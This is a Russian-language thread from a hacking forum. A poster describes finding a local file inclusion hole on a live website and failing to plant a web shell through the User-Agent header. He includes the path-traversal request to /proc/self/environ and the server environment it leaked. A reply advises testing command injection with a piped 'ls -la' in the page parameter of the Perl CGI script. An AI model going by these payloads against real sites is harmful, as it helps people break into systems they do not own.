Форум АНТИЧАТ - Не выводится User Agent [LFI]

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)

- - Не выводится User Agent [LFI] (https://forum.antichat.xyz/showthread.php?t=233644)

Вообщем нашел LFI на сайте. Немогу через User Agent залить шелл. Даже не пашет. Вот что выводит:

Цитата:

Сообщение от None

PATH=/usr/local/bin:/usr/bin:/bin�HTTP_HOST=www.site.com�
HTTP_USER_AGENT=
HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8�HTTP_ACCEPT_LANGUAGE=ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3�HTTP_ACCEPT_ENCODING=gzip,defl ate�HTTP_ACCEPT_CHARSET=windows-1251,utf-8;q=0.7,*;q=0.7�HTTP_KEEP_ALIVE=115�HTTP_CONNE CTION=keep-alive�HTTP_CACHE_CONTROL=max-age=0�SERVER_SIGNATURE=�SERVER_SOFTWARE=Apache �SERVER_NAME=www.site.com�SERVER_ADDR=216.*.*. 22�SERVER_PORT=80�REMOTE_ADDR=*.*.177.249�DO CUMENT_ROOT=/home/03/97/7009703/web�SERVER_ADMIN=root�SCRIPT_FILENAME=/home/03/97/7009703/web/index.cgi�REMOTE_PORT=12488�GATEWAY_INTERFACE= CGI/1.1�SERVER_PROTOCOL=HTTP/1.1�REQUEST_METHOD=GET�QUERY_STRING=page=../../../../../../../../../../proc/self/environ%00�REQUEST_URI=/index.cgi?page=../../../../../../../../../../proc/self/environ%00�SCRIPT_NAME=/index.cgi�

Советую обратить внимание на эти строки

SCRIPT_NAME=/index.cgi

REQUEST_URI=/index.cgi?page=../../../../../../../../../../proc/self/environ%00

GATEWAY_INTERFACE=CGI/1.1

Чхорт Как же можно залить шелл?

DCrypt

Можно, но не средствами PHP, как ты пытаешься это сделать, а средствами Perl.

Вообще, там скорее всего читалка, а не инклуд, учитывая некоторые особенности языка.

Попробуй прописать какие нибудь системные команды index.cgi?page=| ls -la и тд, будут ли они выполняться.